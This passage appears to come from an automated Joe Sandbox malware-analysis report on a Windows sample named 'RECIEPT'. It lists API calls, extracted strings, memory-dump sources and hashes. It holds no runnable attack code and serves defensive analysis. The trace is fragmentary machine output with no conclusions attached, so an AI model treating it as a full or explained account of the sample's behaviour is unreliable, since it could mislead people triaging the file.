                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                        APIs
                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 1976180769-4113822522
                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                        • String ID:
                                        • API String ID: 461458858-0
                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                        • DeleteObject.GDI32(?), ref: 004301D0
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3969911579-0
                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                        • String ID: 0
                                        • API String ID: 956284711-4108050209
                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 1965227024-3771769585
                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                        APIs
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove_wcslen
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 369157077-1007645807
                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                        APIs
                                        • GetParent.USER32 ref: 00445BF8
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                        • __wcsicoll.LIBCMT ref: 00445C33
                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 3125838495-3381328864
                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                        APIs
                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID:
                                        • API String ID: 1350042424-0
                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                        APIs
                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                        • _wcscpy.LIBCMT ref: 004787E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 3052893215-2127371420
                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                        APIs
                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                        • __swprintf.LIBCMT ref: 0045E7F7
                                        • _wprintf.LIBCMT ref: 0045E8B3
                                        • _wprintf.LIBCMT ref: 0045E8D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2295938435-2354261254
                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 3038501623-2263619337
                                        • Opcode ID: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                        • Opcode Fuzzy Hash: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                        APIs
                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                        • __swprintf.LIBCMT ref: 0045E5F6
                                        • _wprintf.LIBCMT ref: 0045E6A3
                                        • _wprintf.LIBCMT ref: 0045E6C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2295938435-8599901
                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                        APIs
                                        • timeGetTime.WINMM ref: 00443B67
                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                        • SetActiveWindow.USER32(?), ref: 00443BEC
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                        • IsWindow.USER32(?), ref: 00443C3A
                                        • EndDialog.USER32(?,00000000), ref: 00443C4C
                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                        • String ID: BUTTON
                                        • API String ID: 1834419854-3405671355
                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                        • LoadStringW.USER32(00000000), ref: 00454040
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • _wprintf.LIBCMT ref: 00454074
                                        • __swprintf.LIBCMT ref: 004540A3
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 455036304-4153970271
                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
